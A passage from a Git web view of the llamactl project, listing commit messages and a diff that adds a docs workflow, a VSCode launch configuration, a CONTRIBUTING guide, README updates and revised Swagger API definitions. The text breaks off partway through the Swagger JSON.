90 Commits

Author SHA1 Message Date
e2f2b721e1 Merge pull request #28 from lordmathis/docs/user-guide
docs: Add mkdocs based user documentation
2025-09-03 23:29:09 +02:00
8c121dd28c Add create instance screenshot and update managing instances documentation 2025-09-03 23:23:55 +02:00
5eada9b6ce Replace main screenshot 2025-09-03 23:09:50 +02:00
ef1a2601fb Update managing-instances.md with new HuggingFace repository and file examples 2025-09-03 23:04:11 +02:00
3013a343f1 Update documentation: remove Web UI guide and adjust navigation links 2025-09-03 22:47:15 +02:00
969b4b14e1 Refactor installation and troubleshooting documentation for clarity and completeness 2025-09-03 21:11:26 +02:00
56756192e3 Fix formatting in configuration.md 2025-09-02 22:05:01 +02:00
131b1b407d Update api-referrence 2025-09-02 22:05:01 +02:00
81a6c14bf6 Update api docs 2025-09-02 22:05:01 +02:00
b08f15c5d0 Remove misleading advanced section 2025-09-02 22:05:01 +02:00
92af14b350 Improve index.md 2025-09-02 22:05:01 +02:00
b51974bbf7 Imrove getting started section 2025-09-02 22:05:01 +02:00
0b264c8015 Fix typos and consistent naming for Llamactl across documentation 2025-09-02 22:05:01 +02:00
bd31c03f4a Create initial documentation structure 2025-09-02 22:05:01 +02:00
7675271370 Merge pull request #27 from lordmathis/feat/separate-backend-options
feat: Separate backend options from common instance options
2025-09-02 22:03:35 +02:00
d697f83b46 Update GetProxy method to use BackendTypeLlamaCpp constant for backend type 2025-09-02 21:56:38 +02:00
712d28ea42 Remove port marking logic from CreateInstance method 2025-09-02 21:56:25 +02:00
0fd3613798 Refactor backend type from LLAMA_SERVER to LLAMA_CPP across components and tests 2025-09-02 21:19:22 +02:00
4f6bb6292e Implement backend configuration options and refactor related components 2025-09-02 21:12:14 +02:00
d9542ba117 Refactor instance management to support backend types and options 2025-09-01 21:59:18 +02:00
9a4dafeee8 Merge pull request #26 from lordmathis/feat/lru-eviction
feat: Implement least recently used instance eviction
2025-08-31 12:44:06 +02:00
9579930a6a Simplify LRU eviction tests 2025-08-31 11:46:16 +02:00
447f441fd0 Move LRU eviction to timeout.go 2025-08-31 11:42:32 +02:00
27012b6de6 Split manager tests into multiple test files 2025-08-31 11:39:44 +02:00
905e685107 Add LRU eviction tests for instance management 2025-08-31 11:30:57 +02:00
d6d4792a0c Skip eviction for instances without a valid idle timeout 2025-08-31 00:59:26 +02:00
da26f607d4 Update README to enhance resource management details and add configuration options for max running instances and LRU eviction 2025-08-31 00:56:35 +02:00
894f3c3213 Refactor StartInstance method to improve max running instances check 2025-08-31 00:14:29 +02:00
c1fa0faf4b Add LastRequestTime method and LRU eviction logic for instance management 2025-08-30 23:59:37 +02:00
4581d67165 Enhance instance management: improve on-demand start handling and add LRU eviction logic 2025-08-30 23:13:08 +02:00
58cb36bd18 Refactor instance management: replace CanStartInstance with IsMaxRunningInstancesReached method 2025-08-30 23:12:58 +02:00
68253be3e8 Add CanStartInstance method to check instance start conditions 2025-08-30 22:47:15 +02:00
a9f1c1a619 Add LRU eviction configuration for instances 2025-08-30 22:26:02 +02:00
8fdebb069c Merge pull request #25 from lordmathis/fix/stopping-deadlock
fix: Server stopping deadlock
2025-08-30 22:12:07 +02:00
fdd46859b9 Add environment variables for development configuration in launch.json 2025-08-30 22:04:52 +02:00
74495f8163 Refactor Shutdown method to improve instance stopping logic and avoid deadlocks 2025-08-30 22:04:43 +02:00
8ec36dd1b7 Merge pull request #24 from lordmathis/feat/max-running-instances
feat: Implement max running instances constraint and refactor instances status
2025-08-28 20:45:27 +02:00
c4ed745ba9 Fix comparison operators in useInstanceHealth hook 2025-08-28 20:43:41 +02:00
9d548e6dda Remove wrong MaxRunningInstancesError type 2025-08-28 20:42:56 +02:00
41d8c41188 Introduce MaxRunningInstancesError type and handle it in StartInstance handler 2025-08-28 20:07:03 +02:00
7d5c68e671 Add launch configuration for Go server in VSCode 2025-08-28 19:19:55 +02:00
e319731239 Remove unnecessary read locks from GetStatus and IsRunning methods 2025-08-28 19:19:28 +02:00
b698c1d0ea Remove locks from SetStatus 2025-08-28 19:08:20 +02:00
227ca7927a Refactor SetStatus method to capture onStatusChange callback reference before unlocking mutex 2025-08-28 18:59:26 +02:00
0b058237fe Enforce maximum running instances limit in StartInstance method 2025-08-27 21:18:38 +02:00
ae37055331 Add onStatusChange callback to instance management for status updates 2025-08-27 20:54:26 +02:00
a8f3a8e0f5 Refactor instance status handling on the frontend 2025-08-27 20:11:21 +02:00
b41ebdc604 Set instance status to Failed when restart conditions are not met 2025-08-27 19:47:36 +02:00
1443746add Refactor instance status management: replace Running boolean with InstanceStatus enum and update related methods 2025-08-27 19:44:38 +02:00
615c2ac54e Add MaxRunningInstances to InstancesConfig and implement IsRunning method 2025-08-27 18:42:34 +02:00
a6e3cb4a9b Merge pull request #23 from lordmathis/feat/start-on-request
feat: On-Demand Instance Start
2025-08-20 16:04:59 +02:00
9181c3d7bc Remove unused import from zodFormUtils.ts 2025-08-20 16:03:09 +02:00
1939b45312 Refactor WaitForHealthy method to use direct health check URL and simplify health check logic 2025-08-20 15:58:08 +02:00
8265a94bf7 Add on-demand start configuration to instance options and basic fields 2025-08-20 14:56:11 +02:00
4bc9362f7a Add default on-demand start settings and timeout configuration to README 2025-08-20 14:41:42 +02:00
ddb54763f6 Add OnDemandStartTimeout configuration and update OpenAIProxy to use it 2025-08-20 14:25:43 +02:00
496ab3aa5d Update README to clarify on-demand instance start feature 2025-08-20 14:22:55 +02:00
287a5e0817 Implement WaitForHealthy method and enhance OpenAIProxy to support on-demand instance start 2025-08-20 14:19:12 +02:00
7b4adfa0cd Add DefaultOnDemandStart configuration and update instance options 2025-08-20 13:50:43 +02:00
651c8b9b2c Merge pull request #22 from lordmathis/feat/timeout
feat: Implement idle instance timeout
2025-08-20 13:34:38 +02:00
7194e1fdd1 Update README to clarify idle timeout management and state persistence features 2025-08-20 13:32:03 +02:00
492c3ff270 Remove redundant timeout tests and improve test coverage for instance timeout validation 2025-08-20 13:25:56 +02:00
00a3cba717 Enhance shutdown handling in InstanceManager with proper synchronization and max instances check 2025-08-19 22:34:48 +02:00
eb1d4ab55f Enhance timeout functionality tests to validate configuration and logic without starting instances 2025-08-19 20:52:59 +02:00
a9e3801eae Refactor logging in checkAllTimeouts 2025-08-19 19:25:15 +02:00
1aaab96cec Add idle timeout configuration to instance options and basic fields 2025-08-19 19:24:54 +02:00
78eda77e44 Enhance timeout handling in InstanceManager with goroutine recovery and shutdown support 2025-08-17 22:49:28 +02:00
d70bb634cd Implement instance tests for timeout 2025-08-17 21:50:16 +02:00
41eaebc927 Add TimeoutCheckInterval to instance configuration in tests 2025-08-17 21:42:52 +02:00
c45fa13206 Initialize last request time on instance start and update timeout handling logic 2025-08-17 21:15:28 +02:00
5e3a28398d Implement periodic timeout checking for instances 2025-08-17 21:10:48 +02:00
c734bcae4a Move UpdateLastRequestTime method to timeout.go and add ShouldTimeout method for idle timeout handling 2025-08-17 20:37:20 +02:00
e4e7a82294 Implement last request time tracking for instance management 2025-08-17 19:44:57 +02:00
ccffbca6b2 Add timeout check interval and update instance configuration 2025-08-17 19:26:21 +02:00
902be409d5 Add IdleTimeout option to CreateInstanceOptions and update JSON handling 2025-08-17 19:06:09 +02:00
eb9599f26a Merge pull request #21 from lordmathis/feat/dark-mode
feat: Implement dark theme and theme switching
2025-08-11 17:56:16 +02:00
ebf8dfdeab Mock window.matchMedia for dark mode functionality in tests 2025-08-11 17:54:04 +02:00
f15c0840c4 Implement dark theme and theme switching 2025-08-11 17:39:56 +02:00
e702bcb694 Create CNAME 2025-08-08 13:41:58 +02:00
4895fbff15 Merge pull request #20 from lordmathis/docs/contributing
docs: Add CONTRIBUTING.md to outline development setup and contribution process
2025-08-07 21:13:01 +02:00
282fe67355 Add CONTRIBUTING.md to outline development setup and contribution process 2025-08-07 21:10:01 +02:00
96a36e1119 Merge pull request #19 from lordmathis/docs/readme-screenshot
docs: Add dashboard screenshot to README
2025-08-07 19:55:15 +02:00
759fc58326 Update README to include dashboard screenshot 2025-08-07 19:51:34 +02:00
afef3d0180 Update import path for API documentation to use apidocs 2025-08-07 19:48:28 +02:00
a87652937f Move swagger documentation to apidoc 2025-08-07 19:48:03 +02:00
7bde12db47 Merge pull request #18 from lordmathis/feat/show-version
feat: Show app version on backend and frontend
2025-08-07 19:11:58 +02:00
e2b64620b5 Expose version endpoint 2025-08-07 19:10:06 +02:00
3ba62af01a Add VITE_APP_VERSION to environment and update SystemInfoDialog to display version 2025-08-07 19:01:31 +02:00
0150429e82 Add commit hash and build time to version output 2025-08-07 18:48:35 +02:00
2ecf096024 Add version flag to display llamactl version 2025-08-07 18:46:49 +02:00
62 changed files with 4163 additions and 1525 deletions

65
.github/workflows/docs.yml vendored Normal file
View File

@@ -0,0 +1,65 @@
name: Build and Deploy Documentation
on:
push:
branches: [ main ]
paths:
- 'docs/**'
- 'mkdocs.yml'
- 'docs-requirements.txt'
- '.github/workflows/docs.yml'
pull_request:
branches: [ main ]
paths:
- 'docs/**'
- 'mkdocs.yml'
- 'docs-requirements.txt'
permissions:
contents: read
pages: write
id-token: write
concurrency:
group: "pages"
cancel-in-progress: false
jobs:
build:
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v4
with:
fetch-depth: 0 # Needed for git-revision-date-localized plugin
- name: Setup Python
uses: actions/setup-python@v4
with:
python-version: '3.11'
- name: Install dependencies
run: |
pip install -r docs-requirements.txt
- name: Build documentation
run: |
mkdocs build --strict
- name: Upload documentation artifact
if: github.ref == 'refs/heads/main'
uses: actions/upload-pages-artifact@v3
with:
path: ./site
deploy:
if: github.ref == 'refs/heads/main'
environment:
name: github-pages
url: ${{ steps.deployment.outputs.page_url }}
runs-on: ubuntu-latest
needs: build
steps:
- name: Deploy to GitHub Pages
id: deployment
uses: actions/deploy-pages@v4

View File

@@ -29,6 +29,8 @@ jobs:
npm ci npm ci
- name: Build Web UI - name: Build Web UI
env:
VITE_APP_VERSION: ${{ github.ref_name }}
run: | run: |
cd webui cd webui
npm run build npm run build

19
.vscode/launch.json vendored Normal file
View File

@@ -0,0 +1,19 @@
{
// Use IntelliSense to learn about possible attributes.
// Hover to view descriptions of existing attributes.
// For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
"version": "0.2.0",
"configurations": [
{
"name": "Launch Server",
"type": "go",
"request": "launch",
"mode": "auto",
"program": "${workspaceFolder}/cmd/server/main.go",
"env": {
"GO_ENV": "development",
"LLAMACTL_REQUIRE_MANAGEMENT_AUTH": "false"
},
}
]
}

1
CNAME Normal file
View File

@@ -0,0 +1 @@
llamactl.org

182
CONTRIBUTING.md Normal file
View File

@@ -0,0 +1,182 @@
# Contributing to Llamactl
Thank you for considering contributing to Llamactl! This document outlines the development setup and contribution process.
## Development Setup
### Prerequisites
- Go 1.24 or later
- Node.js 22 or later
- `llama-server` executable (from [llama.cpp](https://github.com/ggml-org/llama.cpp))
### Getting Started
1. **Clone the repository**
```bash
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
```
2. **Install dependencies**
```bash
# Go dependencies
go mod download
# Frontend dependencies
cd webui && npm ci && cd ..
```
3. **Run for development**
```bash
# Start backend server
go run ./cmd/server
```
Server will be available at `http://localhost:8080`
```bash
# In a separate terminal, start frontend dev server
cd webui && npm run dev
```
Development UI will be available at `http://localhost:5173`
4. **Common development commands**
```bash
# Backend
go test ./... -v # Run tests
go test -race ./... -v # Run with race detector
go fmt ./... && go vet ./... # Format and vet code
# Frontend (run from webui/ directory)
npm run test:run # Run tests once
npm run test # Run tests in watch mode
npm run type-check # TypeScript type checking
npm run lint:fix # Lint and fix issues
```
## Before Submitting a Pull Request
### Required Checks
All the following must pass:
1. **Backend**
```bash
go test ./... -v
go test -race ./... -v
go fmt ./... && go vet ./...
go build -o llamactl ./cmd/server
```
2. **Frontend**
```bash
cd webui
npm run test:run
npm run type-check
npm run build
```
### API Documentation
If changes affect API endpoints, update Swagger documentation:
```bash
# Install swag if needed
go install github.com/swaggo/swag/cmd/swag@latest
# Update Swagger comments in pkg/server/handlers.go
# Then regenerate docs
swag init -g cmd/server/main.go -o apidocs
```
## Pull Request Guidelines
### Pull Request Titles
Use this format for pull request titles:
- `feat:` for new features
- `fix:` for bug fixes
- `docs:` for documentation changes
- `test:` for test additions or modifications
- `refactor:` for code refactoring
### Submission Process
1. Create a feature branch from `main`
2. Make changes following the coding standards
3. Run all required checks listed above
4. Update documentation if necessary
5. Submit pull request with:
- Clear description of changes
- Reference to any related issues
- Screenshots for UI changes
## Code Style and Testing
### Testing Strategy
- Backend tests use Go's built-in testing framework
- Frontend tests use Vitest and React Testing Library
- Run tests frequently during development
- Add tests for new features and bug fixes
### Go
- Follow standard Go formatting (`go fmt`)
- Use meaningful variable and function names
- Add comments for exported functions and types
- Handle errors appropriately
### TypeScript/React
- Use TypeScript strictly (avoid `any` when possible)
- Follow React hooks best practices
- Use meaningful component and variable names
- Prefer functional components over class components
## Documentation Development
This project uses MkDocs for documentation. When working on documentation:
### Setup Documentation Environment
```bash
# Install documentation dependencies
pip install -r docs-requirements.txt
```
### Development Workflow
```bash
# Serve documentation locally for development
mkdocs serve
```
The documentation will be available at http://localhost:8000
```bash
# Build static documentation site
mkdocs build
```
The built site will be in the `site/` directory.
### Documentation Structure
- `docs/` - Documentation content (Markdown files)
- `mkdocs.yml` - MkDocs configuration
- `docs-requirements.txt` - Python dependencies for documentation
### Adding New Documentation
When adding new documentation:
1. Create Markdown files in the appropriate `docs/` subdirectory
2. Update the navigation in `mkdocs.yml`
3. Test locally with `mkdocs serve`
4. Submit a pull request
### Documentation Deployment
Documentation is automatically built and deployed to GitHub Pages when changes are pushed to the main branch.
## Getting Help
- Check existing [issues](https://github.com/lordmathis/llamactl/issues)
- Review the [README.md](README.md) for usage documentation
- Look at existing code for patterns and conventions
Thank you for contributing to Llamactl!

104
README.md
View File

@@ -2,7 +2,7 @@
![Build and Release](https://github.com/lordmathis/llamactl/actions/workflows/release.yaml/badge.svg) ![Go Tests](https://github.com/lordmathis/llamactl/actions/workflows/go_test.yaml/badge.svg) ![WebUI Tests](https://github.com/lordmathis/llamactl/actions/workflows/webui_test.yaml/badge.svg) ![Build and Release](https://github.com/lordmathis/llamactl/actions/workflows/release.yaml/badge.svg) ![Go Tests](https://github.com/lordmathis/llamactl/actions/workflows/go_test.yaml/badge.svg) ![WebUI Tests](https://github.com/lordmathis/llamactl/actions/workflows/webui_test.yaml/badge.svg)
**Management server for multiple llama.cpp instances with OpenAI-compatible API routing.** **Management server and proxy for multiple llama.cpp instances with OpenAI-compatible API routing.**
## Why llamactl? ## Why llamactl?
@@ -11,7 +11,11 @@
🌐 **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools) 🌐 **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools)
🔐 **API Key Authentication**: Separate keys for management vs inference access 🔐 **API Key Authentication**: Separate keys for management vs inference access
📊 **Instance Monitoring**: Health checks, auto-restart, log management 📊 **Instance Monitoring**: Health checks, auto-restart, log management
**Persistent State**: Instances survive server restarts **Smart Resource Management**: Idle timeout, LRU eviction, and configurable instance limits
💡 **On-Demand Instance Start**: Automatically launch instances upon receiving OpenAI-compatible API requests
💾 **State Persistence**: Ensure instances remain intact across server restarts
![Dashboard Screenshot](docs/images/dashboard.png)
**Choose llamactl if**: You need authentication, health monitoring, auto-restart, and centralized management of multiple llama-server instances **Choose llamactl if**: You need authentication, health monitoring, auto-restart, and centralized management of multiple llama-server instances
**Choose Ollama if**: You want the simplest setup with strong community ecosystem and third-party integrations **Choose Ollama if**: You want the simplest setup with strong community ecosystem and third-party integrations
@@ -109,10 +113,15 @@ instances:
logs_dir: ~/.local/share/llamactl/logs # Logs directory logs_dir: ~/.local/share/llamactl/logs # Logs directory
auto_create_dirs: true # Auto-create data/config/logs dirs if missing auto_create_dirs: true # Auto-create data/config/logs dirs if missing
max_instances: -1 # Max instances (-1 = unlimited) max_instances: -1 # Max instances (-1 = unlimited)
max_running_instances: -1 # Max running instances (-1 = unlimited)
enable_lru_eviction: true # Enable LRU eviction for idle instances
llama_executable: llama-server # Path to llama-server executable llama_executable: llama-server # Path to llama-server executable
default_auto_restart: true # Auto-restart new instances by default default_auto_restart: true # Auto-restart new instances by default
default_max_restarts: 3 # Max restarts for new instances default_max_restarts: 3 # Max restarts for new instances
default_restart_delay: 5 # Restart delay (seconds) for new instances default_restart_delay: 5 # Restart delay (seconds) for new instances
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Idle instance timeout check in minutes
auth: auth:
require_inference_auth: true # Require auth for inference endpoints require_inference_auth: true # Require auth for inference endpoints
@@ -121,96 +130,7 @@ auth:
management_keys: [] # Keys for management endpoints management_keys: [] # Keys for management endpoints
``` ```
<details><summary><strong>Full Configuration Guide</strong></summary> For detailed configuration options including environment variables, file locations, and advanced settings, see the [Configuration Guide](docs/getting-started/configuration.md).
llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
```
Defaults < Configuration file < Environment variables
```
### Configuration Files
#### Configuration File Locations
Configuration files are searched in the following locations (in order of precedence):
**Linux/macOS:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `$HOME/.config/llamactl/config.yaml`
- `/etc/llamactl/config.yaml`
**Windows:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `%APPDATA%\llamactl\config.yaml`
- `%USERPROFILE%\llamactl\config.yaml`
- `%PROGRAMDATA%\llamactl\config.yaml`
You can specify the path to config file with `LLAMACTL_CONFIG_PATH` environment variable.
### Configuration Options
#### Server Configuration
```yaml
server:
host: "0.0.0.0" # Server host to bind to (default: "0.0.0.0")
port: 8080 # Server port to bind to (default: 8080)
allowed_origins: ["*"] # CORS allowed origins (default: ["*"])
enable_swagger: false # Enable Swagger UI (default: false)
```
**Environment Variables:**
- `LLAMACTL_HOST` - Server host
- `LLAMACTL_PORT` - Server port
- `LLAMACTL_ALLOWED_ORIGINS` - Comma-separated CORS origins
- `LLAMACTL_ENABLE_SWAGGER` - Enable Swagger UI (true/false)
#### Instance Configuration
```yaml
instances:
port_range: [8000, 9000] # Port range for instances (default: [8000, 9000])
data_dir: "~/.local/share/llamactl" # Directory for all llamactl data (default varies by OS)
configs_dir: "~/.local/share/llamactl/instances" # Directory for instance configs (default: data_dir/instances)
logs_dir: "~/.local/share/llamactl/logs" # Directory for instance logs (default: data_dir/logs)
auto_create_dirs: true # Automatically create data/config/logs directories (default: true)
max_instances: -1 # Maximum instances (-1 = unlimited)
llama_executable: "llama-server" # Path to llama-server executable
default_auto_restart: true # Default auto-restart setting
default_max_restarts: 3 # Default maximum restart attempts
default_restart_delay: 5 # Default restart delay in seconds
```
**Environment Variables:**
- `LLAMACTL_INSTANCE_PORT_RANGE` - Port range (format: "8000-9000" or "8000,9000")
- `LLAMACTL_DATA_DIRECTORY` - Data directory path
- `LLAMACTL_INSTANCES_DIR` - Instance configs directory path
- `LLAMACTL_LOGS_DIR` - Log directory path
- `LLAMACTL_AUTO_CREATE_DATA_DIR` - Auto-create data/config/logs directories (true/false)
- `LLAMACTL_MAX_INSTANCES` - Maximum number of instances
- `LLAMACTL_LLAMA_EXECUTABLE` - Path to llama-server executable
- `LLAMACTL_DEFAULT_AUTO_RESTART` - Default auto-restart setting (true/false)
- `LLAMACTL_DEFAULT_MAX_RESTARTS` - Default maximum restarts
- `LLAMACTL_DEFAULT_RESTART_DELAY` - Default restart delay in seconds
#### Authentication Configuration
```yaml
auth:
require_inference_auth: true # Require API key for OpenAI endpoints (default: true)
inference_keys: [] # List of valid inference API keys
require_management_auth: true # Require API key for management endpoints (default: true)
management_keys: [] # List of valid management API keys
```
**Environment Variables:**
- `LLAMACTL_REQUIRE_INFERENCE_AUTH` - Require auth for OpenAI endpoints (true/false)
- `LLAMACTL_INFERENCE_KEYS` - Comma-separated inference API keys
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
</details>
## License ## License

View File

@@ -1,5 +1,5 @@
// Package docs Code generated by swaggo/swag. DO NOT EDIT // Package apidocs Code generated by swaggo/swag. DO NOT EDIT
package docs package apidocs
import "github.com/swaggo/swag" import "github.com/swaggo/swag"
@@ -37,7 +37,7 @@ const docTemplate = `{
"schema": { "schema": {
"type": "array", "type": "array",
"items": { "items": {
"$ref": "#/definitions/llamactl.Instance" "$ref": "#/definitions/instance.Process"
} }
} }
}, },
@@ -75,7 +75,7 @@ const docTemplate = `{
"200": { "200": {
"description": "Instance details", "description": "Instance details",
"schema": { "schema": {
"$ref": "#/definitions/llamactl.Instance" "$ref": "#/definitions/instance.Process"
} }
}, },
"400": { "400": {
@@ -120,7 +120,7 @@ const docTemplate = `{
"in": "body", "in": "body",
"required": true, "required": true,
"schema": { "schema": {
"$ref": "#/definitions/llamactl.CreateInstanceOptions" "$ref": "#/definitions/instance.CreateInstanceOptions"
} }
} }
], ],
@@ -128,7 +128,7 @@ const docTemplate = `{
"200": { "200": {
"description": "Updated instance details", "description": "Updated instance details",
"schema": { "schema": {
"$ref": "#/definitions/llamactl.Instance" "$ref": "#/definitions/instance.Process"
} }
}, },
"400": { "400": {
@@ -173,7 +173,7 @@ const docTemplate = `{
"in": "body", "in": "body",
"required": true, "required": true,
"schema": { "schema": {
"$ref": "#/definitions/llamactl.CreateInstanceOptions" "$ref": "#/definitions/instance.CreateInstanceOptions"
} }
} }
], ],
@@ -181,7 +181,7 @@ const docTemplate = `{
"201": { "201": {
"description": "Created instance details", "description": "Created instance details",
"schema": { "schema": {
"$ref": "#/definitions/llamactl.Instance" "$ref": "#/definitions/instance.Process"
} }
}, },
"400": { "400": {
@@ -401,7 +401,7 @@ const docTemplate = `{
"200": { "200": {
"description": "Restarted instance details", "description": "Restarted instance details",
"schema": { "schema": {
"$ref": "#/definitions/llamactl.Instance" "$ref": "#/definitions/instance.Process"
} }
}, },
"400": { "400": {
@@ -444,7 +444,7 @@ const docTemplate = `{
"200": { "200": {
"description": "Started instance details", "description": "Started instance details",
"schema": { "schema": {
"$ref": "#/definitions/llamactl.Instance" "$ref": "#/definitions/instance.Process"
} }
}, },
"400": { "400": {
@@ -487,7 +487,7 @@ const docTemplate = `{
"200": { "200": {
"description": "Stopped instance details", "description": "Stopped instance details",
"schema": { "schema": {
"$ref": "#/definitions/llamactl.Instance" "$ref": "#/definitions/instance.Process"
} }
}, },
"400": { "400": {
@@ -639,7 +639,35 @@ const docTemplate = `{
"200": { "200": {
"description": "List of OpenAI-compatible instances", "description": "List of OpenAI-compatible instances",
"schema": { "schema": {
"$ref": "#/definitions/llamactl.OpenAIListInstancesResponse" "$ref": "#/definitions/server.OpenAIListInstancesResponse"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/version": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the version of the llamactl command",
"tags": [
"version"
],
"summary": "Get llamactl version",
"responses": {
"200": {
"description": "Version information",
"schema": {
"type": "string"
} }
}, },
"500": { "500": {
@@ -653,7 +681,7 @@ const docTemplate = `{
} }
}, },
"definitions": { "definitions": {
"llamactl.CreateInstanceOptions": { "instance.CreateInstanceOptions": {
"type": "object", "type": "object",
"properties": { "properties": {
"alias": { "alias": {
@@ -751,7 +779,6 @@ const docTemplate = `{
"type": "string" "type": "string"
}, },
"draft_max": { "draft_max": {
"description": "Speculative decoding params",
"type": "integer" "type": "integer"
}, },
"draft_min": { "draft_min": {
@@ -857,6 +884,10 @@ const docTemplate = `{
"host": { "host": {
"type": "string" "type": "string"
}, },
"idle_timeout": {
"description": "Idle timeout",
"type": "integer"
},
"ignore_eos": { "ignore_eos": {
"type": "boolean" "type": "boolean"
}, },
@@ -955,7 +986,7 @@ const docTemplate = `{
"type": "boolean" "type": "boolean"
}, },
"no_context_shift": { "no_context_shift": {
"description": "Server/Example-specific params", "description": "Example-specific params",
"type": "boolean" "type": "boolean"
}, },
"no_escape": { "no_escape": {
@@ -991,6 +1022,10 @@ const docTemplate = `{
"numa": { "numa": {
"type": "string" "type": "string"
}, },
"on_demand_start": {
"description": "On demand start",
"type": "boolean"
},
"override_kv": { "override_kv": {
"type": "array", "type": "array",
"items": { "items": {
@@ -1027,10 +1062,10 @@ const docTemplate = `{
"presence_penalty": { "presence_penalty": {
"type": "number" "type": "number"
}, },
"priority": { "prio": {
"type": "integer" "type": "integer"
}, },
"priority_batch": { "prio_batch": {
"type": "integer" "type": "integer"
}, },
"props": { "props": {
@@ -1051,8 +1086,7 @@ const docTemplate = `{
"reranking": { "reranking": {
"type": "boolean" "type": "boolean"
}, },
"restart_delay_seconds": { "restart_delay": {
"description": "RestartDelay duration in seconds",
"type": "integer" "type": "integer"
}, },
"rope_freq_base": { "rope_freq_base": {
@@ -1101,7 +1135,7 @@ const docTemplate = `{
"ssl_key_file": { "ssl_key_file": {
"type": "string" "type": "string"
}, },
"temperature": { "temp": {
"type": "number" "type": "number"
}, },
"tensor_split": { "tensor_split": {
@@ -1167,7 +1201,20 @@ const docTemplate = `{
} }
} }
}, },
"llamactl.Instance": { "instance.InstanceStatus": {
"type": "integer",
"enum": [
0,
1,
2
],
"x-enum-varnames": [
"Stopped",
"Running",
"Failed"
]
},
"instance.Process": {
"type": "object", "type": "object",
"properties": { "properties": {
"created": { "created": {
@@ -1177,13 +1224,17 @@ const docTemplate = `{
"name": { "name": {
"type": "string" "type": "string"
}, },
"running": { "status": {
"description": "Status", "description": "Status",
"type": "boolean" "allOf": [
{
"$ref": "#/definitions/instance.InstanceStatus"
}
]
} }
} }
}, },
"llamactl.OpenAIInstance": { "server.OpenAIInstance": {
"type": "object", "type": "object",
"properties": { "properties": {
"created": { "created": {
@@ -1200,13 +1251,13 @@ const docTemplate = `{
} }
} }
}, },
"llamactl.OpenAIListInstancesResponse": { "server.OpenAIListInstancesResponse": {
"type": "object", "type": "object",
"properties": { "properties": {
"data": { "data": {
"type": "array", "type": "array",
"items": { "items": {
"$ref": "#/definitions/llamactl.OpenAIInstance" "$ref": "#/definitions/server.OpenAIInstance"
} }
}, },
"object": { "object": {

View File

@@ -30,7 +30,7 @@
"schema": { "schema": {
"type": "array", "type": "array",
"items": { "items": {
"$ref": "#/definitions/llamactl.Instance" "$ref": "#/definitions/instance.Process"
} }
} }
}, },
@@ -68,7 +68,7 @@
"200": { "200": {
"description": "Instance details", "description": "Instance details",
"schema": { "schema": {
"$ref": "#/definitions/llamactl.Instance" "$ref": "#/definitions/instance.Process"
} }
}, },
"400": { "400": {
@@ -113,7 +113,7 @@
"in": "body", "in": "body",
"required": true, "required": true,
"schema": { "schema": {
"$ref": "#/definitions/llamactl.CreateInstanceOptions" "$ref": "#/definitions/instance.CreateInstanceOptions"
} }
} }
], ],
@@ -121,7 +121,7 @@
"200": { "200": {
"description": "Updated instance details", "description": "Updated instance details",
"schema": { "schema": {
"$ref": "#/definitions/llamactl.Instance" "$ref": "#/definitions/instance.Process"
} }
}, },
"400": { "400": {
@@ -166,7 +166,7 @@
"in": "body", "in": "body",
"required": true, "required": true,
"schema": { "schema": {
"$ref": "#/definitions/llamactl.CreateInstanceOptions" "$ref": "#/definitions/instance.CreateInstanceOptions"
} }
} }
], ],
@@ -174,7 +174,7 @@
"201": { "201": {
"description": "Created instance details", "description": "Created instance details",
"schema": { "schema": {
"$ref": "#/definitions/llamactl.Instance" "$ref": "#/definitions/instance.Process"
} }
}, },
"400": { "400": {
@@ -394,7 +394,7 @@
"200": { "200": {
"description": "Restarted instance details", "description": "Restarted instance details",
"schema": { "schema": {
"$ref": "#/definitions/llamactl.Instance" "$ref": "#/definitions/instance.Process"
} }
}, },
"400": { "400": {
@@ -437,7 +437,7 @@
"200": { "200": {
"description": "Started instance details", "description": "Started instance details",
"schema": { "schema": {
"$ref": "#/definitions/llamactl.Instance" "$ref": "#/definitions/instance.Process"
} }
}, },
"400": { "400": {
@@ -480,7 +480,7 @@
"200": { "200": {
"description": "Stopped instance details", "description": "Stopped instance details",
"schema": { "schema": {
"$ref": "#/definitions/llamactl.Instance" "$ref": "#/definitions/instance.Process"
} }
}, },
"400": { "400": {
@@ -632,7 +632,35 @@
"200": { "200": {
"description": "List of OpenAI-compatible instances", "description": "List of OpenAI-compatible instances",
"schema": { "schema": {
"$ref": "#/definitions/llamactl.OpenAIListInstancesResponse" "$ref": "#/definitions/server.OpenAIListInstancesResponse"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/version": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the version of the llamactl command",
"tags": [
"version"
],
"summary": "Get llamactl version",
"responses": {
"200": {
"description": "Version information",
"schema": {
"type": "string"
} }
}, },
"500": { "500": {
@@ -646,7 +674,7 @@
} }
}, },
"definitions": { "definitions": {
"llamactl.CreateInstanceOptions": { "instance.CreateInstanceOptions": {
"type": "object", "type": "object",
"properties": { "properties": {
"alias": { "alias": {
@@ -744,7 +772,6 @@
"type": "string" "type": "string"
}, },
"draft_max": { "draft_max": {
"description": "Speculative decoding params",
"type": "integer" "type": "integer"
}, },
"draft_min": { "draft_min": {
@@ -850,6 +877,10 @@
"host": { "host": {
"type": "string" "type": "string"
}, },
"idle_timeout": {
"description": "Idle timeout",
"type": "integer"
},
"ignore_eos": { "ignore_eos": {
"type": "boolean" "type": "boolean"
}, },
@@ -948,7 +979,7 @@
"type": "boolean" "type": "boolean"
}, },
"no_context_shift": { "no_context_shift": {
"description": "Server/Example-specific params", "description": "Example-specific params",
"type": "boolean" "type": "boolean"
}, },
"no_escape": { "no_escape": {
@@ -984,6 +1015,10 @@
"numa": { "numa": {
